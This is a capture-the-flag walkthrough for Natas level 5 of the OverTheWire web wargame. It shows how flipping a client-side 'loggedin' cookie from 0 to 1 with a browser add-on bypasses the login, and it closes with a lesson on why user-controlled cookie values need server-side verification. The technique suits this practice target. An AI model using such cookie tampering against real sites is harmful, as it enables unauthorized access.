In today’s post, we’re going to be looking at Level 5 of the Natas wargame hosted by Over The Wire. This is a web-based wargame and requires the password obtained through level 4. Without further adieu, let’s point our browsers at the level5 page and log in!
What’s The Haps?
Upon logging in we get quite an interesting message. This time it says that we are not currently logged in! However, we can see the page loaded, which means we entered the correct username/password for Apache to let us into the directory. Then, what do they mean, we aren’t logged in? Well, let’s look at the source to double check on anything obvious. Nothing much there. Ok, so we haven’t submitted much of anything. So I don’t believe they’re expecting POST/GET data for a form log in (and I wouldn’t know where to start on name/pass). So what could they mean, we aren’t logged in? What could be communicating that, leading to that state?
Well, like we said in level 4, HTTP is a stateless protocol. As such, the fact that we’re not logged in needs to be stored somewhere. Since I haven’t seen us provide info (such as through a web-form), lets look at the next spot that could be checked. Websites often make use of cookies to store bits of data on a user’s computer. This can often be used to track shopping carts, or if a user has logged in to a web application. So, let’s check our cookies.
To view cookies in Chrome, let’s go to Menu -> Settings -> Show Advanced Settings… -> Content Settings -> All Cookies and Site Data -> Type Natas5 into the search box. Firefox users, there is a similar process. Here we can see that there is one cookie used by the natas5 site and that it goes by the name “loggedin”! Looking at it further we can see that it has the value zero (perhaps logic false). So now we know the website uses the cookie, perhaps telling us we aren’t logged in because of the value of the cookie to track state. What will happen if we change the value of the cookie?
Exploit
To exploit this vulnerability, let’s make use of a simple Chrome add-on called “Edit This Cookie.” Perform a quick Google search to download and install the add-on. Then, load the level 5 page. From here, click on the cookie icon in the upper right hand corner of the address bar to open the add-on. It should already be looking at the “loggedin” cookie, with the default value 0. Let’s change that 0 to a 1, then click submit cookie changes. Finally let’s reload the page. We should now see an “Access Granted” message, a long with the password for the next level!
So What?
This level yet again emphasizes the statelessness of the HTTP protocol and the various ways in which state can be added on through cookies. However, it stresses the importance of using a good system for verification of state, since cookie values come from users and thus can be crafted by malicious users.